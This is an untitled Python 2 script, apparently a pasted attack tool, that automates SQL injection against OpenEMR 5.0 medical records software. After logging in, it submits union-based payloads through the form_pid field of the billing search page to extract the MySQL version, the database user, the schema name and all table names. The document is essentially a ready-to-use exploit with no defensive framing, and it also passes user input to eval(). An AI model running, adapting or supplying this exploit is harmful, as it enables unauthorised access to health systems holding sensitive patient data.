Untitled

#Project OpenEMR 5.0
#autmatic sql injection
from bs4 import BeautifulSoup
import re
import getpass
import mechanize
intro = """
                                  '||''''|  '||    ||' '||''|.
  ...   ... ...    ....  .. ...    ||  .     |||  |||   ||   ||
.|  '|.  ||'  || .|...||  ||  ||   ||''|     |'|..'||   ||''|'
||   ||  ||    | ||       ||  ||   ||        | '|' ||   ||   |.
 '|..|'  ||...'   '|...' .||. ||. .||.....| .|. | .||. .||.  '|'
         ||      version 5.0.0
        ''''        SQL Injection Tool

"""
print intro+"\n"

host = raw_input("\nEnter Host: ")
url = ("http://"+host+"/openemr/interface/login/login.php?site=default")
vulnurl = ("http://"+host+"/openemr/interface/billing/sl_eob_search.php/sl_eob_search.php")

br = mechanize.Browser()

br.set_handle_robots(False)
br.set_handle_redirect(True)

r = br.open(url)
br.select_form(nr = 0)

print "Login\n-----"
name = raw_input("Username: ")
passw = getpass.getpass("Password: ")
br.form["authUser"] = name
br.form["clearPass"]  = passw
logged_in  = br.submit()


version = "' union select 1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17#"
user = "' union select 1,2,3,4,5,6,7,8,user(),10,11,12,13,14,15,16,17#"
database ="' union select 1,2,3,4,5,6,7,8,schema(),10,11,12,13,14,15,16,17#"
tables =  "' union select 1,2,3,4,5,6,7,8,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,table_name,0x2c))))x),10,11,12,13,14,15,16,17#"

while 1:
    x = br.open(vulnurl)

    br.select_form(nr = 0)
    print "version = print Mysql Version\nuser = print user of Website\ndatabase = print main database \ntables = Print all tables of Main database"
    input1 = eval(raw_input("\nWhats your choice? "))

    br.form["form_pid"] = "".join(input1)
    query = br.submit()
    end = query.read()

    soup = BeautifulSoup(end,"html.parser")
    href = soup.find_all(onclick="return npopup(2)")

    print href
    print "\n\n"